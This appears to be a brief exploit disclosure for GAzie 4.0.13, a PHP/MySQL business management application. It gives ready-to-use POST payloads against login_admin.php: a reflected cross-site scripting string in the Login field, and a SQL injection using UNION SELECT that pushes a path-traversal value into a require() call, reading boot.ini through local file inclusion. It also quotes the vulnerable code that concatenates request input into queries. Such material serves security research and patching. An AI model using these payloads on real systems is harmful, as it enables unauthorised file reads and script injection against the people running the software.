GAzie - Gestione Aziendale v4.0.13
http://sourceforge.net/projects/gazie/
Finance application written in PHP using a MySql database backend for small to medium enterprise.
It lets you write invoices, manage stock, manage orders , accounting, etc.
Send tax receipt to electronic cash register.
pXSS
http://localhost/gazie/modules/root/login_admin.php
post
Login=1>'><script>alert(1212)</script>
Password=111111
actionflag=Login
----------------
modules/root/login_admin.php
PHP код:
if (isset ($_POST['actionflag'])) {
// checkUser();
$result = gaz_dbi_get_row ($gTables['admin'], "Login", $_POST['Login']);
if (!empty ($result['lang'])){
$lang = $result['lang'];
} else {
$lang = 'italian';
}
require("./lang.".$lang.".php");
library/include/mysql.lib.php
PHP код:
function gaz_dbi_get_row( $table, $fnm, $fval)
{
global $link;
$result = mysql_query("SELECT * FROM $table WHERE $fnm = '$fval'", $link);
if (!$result) die (" Error gaz_dbi_get_row: ".mysql_error());
return mysql_fetch_array( $result);
}
SQL+LFI
mq=off
http://localhost/gazie/modules/root/login_admin.php
post
Login=111'+union+select+1,2,3,"../../../../../../../../../../boot.ini%00",5,6,7,8,9,10,11,12,13+--+
Password=111111
actionflag=Login